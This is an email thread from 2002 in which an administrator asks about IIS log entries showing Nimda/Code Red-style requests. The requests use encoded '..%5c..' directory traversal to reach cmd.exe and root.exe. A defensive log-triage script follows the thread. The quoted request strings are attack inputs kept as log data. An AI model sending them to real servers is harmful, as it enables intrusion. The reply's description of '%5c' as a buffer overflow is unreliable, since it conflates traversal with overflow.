It is patched. Hey, I always keep my babies patched! :) One question though, I thought that the "%5c" was the footprint of the "Double Decode" file traversal attack. Is it an attempted buffer overflow? Or, and my ignorance is showing here, are a file traversal and a buffer overflow the same thing? I know what a buffer overflow is. It was my impression that a file traversal was a flaw in the way IIS dealt with strings representing directory paths.

Jim Grossl
Lee Pesky Learning Center
Boise, Idaho USA

-----Original Message-----
From: Ravila White [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, January 16, 2002 11:35 AM
To: Jim Grossl
Subject: RE: IIS log files, can I have your take on these attacks?

yeah...either nimda or code red. you can tell from the MSADC and also see the buffer overflow "%5c", so the question is did you patch your server. When you go to MS security and find the info on this you will be told to nuke/wipe/format and start from scratch. This is a root level exploit. you can find more info on this at www.symantec.com or www.cert.com or www.sans.org

after you rebuild please do the following:
1) bring the OS up to the latest service pack and hotfixes
2) Patch IIS appropriately
3) get the microsoft security mailing list and the cert mailing list.

thxs./rav

-----Original Message-----
From: Jim Grossl
To: [EMAIL PROTECTED]
Sent: 1/15/02 8:23 AM
Subject: IIS log files, can I have your take on these attacks?

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837
207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

It kind of bothers me to post these on an open list (apparently our Web server doesn't need any more "attention") but I would like to know what everyone thinks of these attacks. My Web server logged > 2000 of these attacks over the weekend.

I'm pretty sure that the attacks are not succeeding, but I've read that if the "%5c" shows up in the Double Decode attack then the file traversal is taking place. Thanks.

Jim Grossl
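As an added example, not part of the thread: a small log triage script that reads lines in the same format as those quoted above, decodes "%5c"/"%2f" escapes (twice, which is what "Double Decode" refers to), flags ".." traversal segments and requests for cmd.exe/root.exe, and records whether the server actually served the request. The sample lines and addresses are constructed for the example; the 404/401 responses in Jim's log mean the requested file was not served, which is the practical check that the traversal did not succeed.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample lines in the same NCSA-style format as the thread's log excerpt.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
203.0.113.5 - - [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
203.0.113.5 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
203.0.113.9 - - [14/Jan/2002:10:31:00 -0700] "GET /index.html HTTP/1.0" 200 5120
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
SUSPECT_FILES = {"cmd.exe", "root.exe"}  # the files requested in the thread's log lines

def normalize_path(target: str) -> str:
    # Strip the query, URL-decode up to two rounds (catches double-encoded escapes),
    # then treat "\" like "/" so ..%5c.. and ..%2f.. normalize to the same thing.
    path = target.split("?", 1)[0]
    for _ in range(2):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()

def classify(line: str) -> Optional[dict]:
    m = LINE_RE.match(line)
    if not m:
        return None  # not a request line we understand; skip it
    path = normalize_path(m["target"])
    segments = path.split("/")
    reasons = []
    if ".." in segments:
        reasons.append("traversal")
    if segments[-1] in SUSPECT_FILES:
        reasons.append("suspect-file")
    # A 200 on a flagged path deserves a closer look; 404/401 mean nothing was served.
    return {"ip": m["ip"], "path": path, "reasons": reasons,
            "served": int(m["status"]) == 200}

def scan(log: str) -> list:
    hits = [classify(l) for l in log.splitlines() if l.strip()]
    return [h for h in hits if h and h["reasons"]]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```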